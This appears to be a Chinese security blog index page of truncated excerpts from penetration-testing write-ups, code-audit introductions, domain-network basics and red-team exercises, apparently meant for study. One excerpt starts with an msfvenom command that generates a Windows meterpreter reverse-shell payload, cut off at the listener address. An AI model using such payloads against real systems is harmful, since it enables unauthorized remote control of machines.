文章来源：酒仙桥六号部队 前言 记述一次授权测试中对某企业进行测试。 PS：渗透过程中的任何敏感信息均已做过脱敏处理，如有雷同，纯属巧合。 外网渗透 通…

文章来源： 酒仙桥六号部队 前言 代码审计(Code Audit) 顾名思义就是通过阅读源代码，从中找出程序源代码中存在的缺陷或安全隐患，提前…

文章来源：酒仙桥六号部队 1背景 本文是前段时间做过的测试，当时并没有进行截图以及记录，所以本文全篇使用本地搭建环境来复现，如有觉得不合理的地方，可能是…

域工作组（Work Group） 工作组是局域网中的一个概念，由许多在同一物理地点，而且被相同的局域网连接起来的用户组成的小组，也可以是遍布一个机构的，…

前言 争当好青年，疫情期间，坚决执行政府与公司的要求，无奈在家办公的我一如既往的接到了渗透测试的任务。 正篇 话不多说，开干。 01 信息搜集 老规矩，…

注：本系列以红日安全的ATT&CK（一）靶场展开 篇幅略长，阅读需耐心。 本章节涉及到的知识点 ew穿透 使用nbtscan扫描主机 cs和ms…

0x00 前言 看到了某篇关于站库分离类型站点相关的讨论，想总结下信息收集的技巧。 0x01 正文 关于站库分离类型站点网上暂时没有找到总结性的文章，所…

文章来源：Admin Team 0x00 前言 前段时间再看 metasploit 和白帽子讲 Web 安全，就一直想自己搭个从 Web 端渗透进入内网…

文章来源：Sec盾 目标：http://xxx.xx.xxx.xxx:9002/xxx/xxm/login.php 访问目标 此时此刻，拿出我们拿出好兄…

1. msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHO…

文章来源： 酒仙桥六号部队 背景 某年的某个夏天，某医院需要做攻防演练，而且是全仿真的演练，只有客户名，没有任何资产信息。时间紧，任务重，于是…